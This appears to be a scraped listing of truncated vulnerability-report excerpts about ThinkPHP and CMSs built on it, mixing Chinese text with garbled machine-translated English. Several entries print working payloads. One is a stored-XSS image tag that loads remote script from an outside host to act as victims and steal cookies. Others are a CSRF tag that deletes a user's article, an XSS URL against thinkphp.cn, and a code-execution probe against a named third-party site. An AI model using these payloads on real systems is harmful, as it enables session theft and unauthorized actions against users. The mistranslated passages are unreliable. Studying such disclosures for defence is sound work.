ThinkPHP the Ubb tag vulnerability to read arbitrary contents of the-vulnerability warning-the black bar safety net

Brief description: ThinkPHP the Ubb tags, there is a code highlighting function, that satisfies: xxx/c odeorp hpxxx/p hpwhen it comes to the middle of the xxx to read, and highlight, the xxx is the path, and the non-specific code, as in Figure 1,The input path, when the file exists, the return is...

OneThink内容管理框架官网储存型XSS攻击

简要描述： 此内容管理框架OneThink为ThinkPHP框架同公司产品。用到了ThinkPHP最新版本3.2。 详细说明： 今天刚开始分析该内容管理框架，说实话，很喜欢BootStrap，喜欢这款内容管理框架，所以决定与小伙伴一起为该内容管理框架的安全努力下去！继续以我的风格，先黑盒后白盒。 漏洞证明：...

ThinkPHP官网存储型XSS

简要描述： 对部分内容处理不当导致用户可在帖子中植入恶意js代码进而进行跨站脚本攻击 详细说明： 由于对附件名称没有进行escape，导致用户可以通过修改文件名为恶意的HTML代码进一步将其植入到帖子中，下面是官方讨论板块演示： 漏洞证明： 一旦恶意代码被植入成功后，所有浏览该页面的用户都会受到跨站脚本攻击。...

ThinkPHP3.2.2模板对字符过滤不严格造成框架崩溃（远程拒绝服务）

简要描述： 模板逻辑处理不当，导致死循环，耗费系统资源。 详细说明： 首先看下模板内容，关键部分在第四行代码处。 配置文件截图 ，首先我们先看下Apache的进程状态： 我们打开首页，再看下Apache进程状态 内存直线上升有木有，三十秒后 我们再来看下日志 img src="https://images.seebug.org/upload/201405/082154323250ec745119445cbf6b02f19b746e88.jpg" alt="00-4.jpg"...

ThinkPHP远程代码执行隐患（需满足特定条件）

简要描述： 其某处处理存在安全隐患，开发者一不小心就可能写出有漏洞的代码造成任意代码执行。 详细说明： 这个问题之前看ThinkSNS就发现了： WooYun: ThinkSNS getshell一枚 ThinkSNS由于使用ThinkPHP模板，造成任意代码执行。 下面分析下ThinkPHP实现细节 模板类是ThinkPHP中一个重要的类，主要实现了为模板变量赋值，模板解析和输出模板变量的逻辑，其中模板变量的赋值通过assign函数进行，模板变量的解析通过display函数，模板编译通过fetch函数，这一系列对模板的读写与编译操作导致了漏洞的产生。...

ThinkPHP官网xss和csrf漏洞（删除指定文章）

简要描述： thinkphp目前官网的整体安全保护都很弱，每次我检测总会找到漏洞。 反正官网也要升级了，也都是些小漏洞，查是查不完的，但总是还有别人还在找官网的漏洞，我也懒得弄了，。 详细说明： 今天想删除以前自己删除的文章,发现没有这个功能, 于是我又就找到了这个利用方法. 删除指定文章,利用方法: 向指定文章作者发送私信,如下: 内容中插入: Imghttp://www.thinkphp.cn/topic/delete/id/123456.html/img 危害,只要作者打开私信,在不知觉情况下已删除自己发布的某篇文章. 理论是官网上目前所有依赖get方式的操作都可能被攻击。...

看我如何调查放置后门之Thinkphp

简要描述： 提交这个我纠结了很久，本来我是可以做一个坏帽子，贼喊捉贼，昨天晚上想了想，我的偶像猪猪侠提交的那些漏洞和我这比我这就是渣渣，他都可以无私的提交而不去换取不正当的金钱，我为什么就不可以呢？这个应该属于通用漏洞奖励鸟 详细说明： 渗透thinkphp完全是因为无聊之余搞了搞，可是没想到的还搞进去了，呵呵，首先在一个群里面发现别人发了一个thinkphp的连接 打开是一个压缩包 800多MB就下载了 可是下载速度我不敢恭维啊，几KB几十KB每秒，呵呵。 下了四个小时才下载完，下载了那么久，当然要看看里面的东西，源码，呵呵这安全运维可真厉害，在里面找到了一个config...

ThinkPHP存储型XSS漏洞一枚

简要描述： 私信功能缺陷挖掘,简单测试,未深入研究.友情测试,并未插入恶意代码. 详细说明： 私信功能缺陷挖掘,简单测试,未深入研究.友情测试,并未插入恶意代码. 私信标题未过滤HTML, 私信标题长度仅在客户端限制,服务器未限制. 私信未加验证码,未加时间限制, 可以用脚本遍历http://www.thinkphp.cn/u/95959.html这个网址ID采集用户名,向全网发送垃圾信息后, 可以通过私信标题XSS截获管理员或普通用户cookie. 私信隐藏字段,type,1为普通私信,2为系统消息 漏洞证明：...

Thinkphp官方网站存储型XSS漏洞一枚

简要描述： 可以在小洞上自由发辉成大洞 XSS小洞一个 详细说明： 讨论区发布话题对UBBcode未过滤完全 imge2.jpg"onerror="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'" onload="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'/img 危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大 漏洞证明：...

ThinkPHP framework of the pass to kill all versions of a SQL injection vulnerability detailed analysis and testing methods-vulnerability warning-the black bar safety net

The following is an excerpt from thinkphp official of an announcement, the official posted directly out of these things is not responsible for the conduct, keep up with the times apache disclosed Struts2 code to perform the same behavior, it will cause a lot of users are black. Suggest similar...

La Cala is another sub-Station command execution vulnerabilities included cross-site threat-vulnerability warning-the black bar safety net

Brief description: Test La Cala a sub-Station, and found the pull Station using THINKPHP open source framework, there is still some risk. Does not affect the customer data, the hazard rating. Detailed description: 1 Nginx service end is not a reasonable configuration to cause arbitrary PHP script...

yourphp cms-stored xss-vulnerability warning-the black bar safety net

yourphp is based on thinkphp framework for the development of the open source cms, there is a storage-typexssvulnerability In the demo of the cms when found this vulnerability, in order to have the power of persuasion, then using the official demo displayxssprocess, In yourphp official...

thinkphp 3.0 爆路径

简要描述： 延续thinkphp之前的url任意代码执行漏洞原理进行学习时发现thinkphp 3.0 出现模块加载失败，会爆应用程序路径! 求邀请码，求带领 详细说明： 1. thinkphp3.0 模块加载失败，出错信息爆应用程序路径。 漏洞证明： 检测有两种情况 1. 可执行命令，这个估计是伪3.0版本？ 交大定票 此站到可以执行命令 http://piao.eeyes.net/index.php/module/action/param1/$%7B@printTHINKVERSION%7D 可查看版本...

ThinkPHP最新版3.0RC1存在XSS漏洞

简要描述： 著名的ThinkPHP最新版3.0RC1存在XSS漏洞 详细说明： ThinkPHP最新版3.0RC1错误提示页面存在一个艰难的XSS漏洞（需要鼠标动作放到“重试”激活） http://www.thinkphp.cn/index.php/%22onmouseover=prompt%289537209%29%3E 漏洞证明：...

ThinkPhp web框架 php代码任意执行漏洞

No description provided by source...

ThinkPHP 2.1/2.2/3.0 Dispatcher.class.php 代码执行漏洞

No description provided by source...

ThinkPHP framework arbitrary code execution vulnerability alerts-a vulnerability alert-the black bar safety net

ThinkPHP is a domestic use of a very wide range of established PHP MVC framework. Looks like the country there are a lot of start-up companies or projects with this framework. Recently the official has released a security patch, the official statement is: the URL is a security vulnerability will...

ThinkPHP development framework xss-vulnerability warning-the black bar safety net

Brief description: open source php development framework for default therexssvulnerabilities, leading to all use of the framework for the development of the system are presentxssvulnerability Detailed description: does not does not exist in the module handle the error properly, leading...

ThinkPHP 1.5 / 2.0 Cross Site Scripting

Title: ThinkPHP Securitylab.ir- the truly thief of Iran!! Spring Brother will blast ur Ass!!!...

ThinkPHP 2.0 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/39909/info ThinkPHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of t...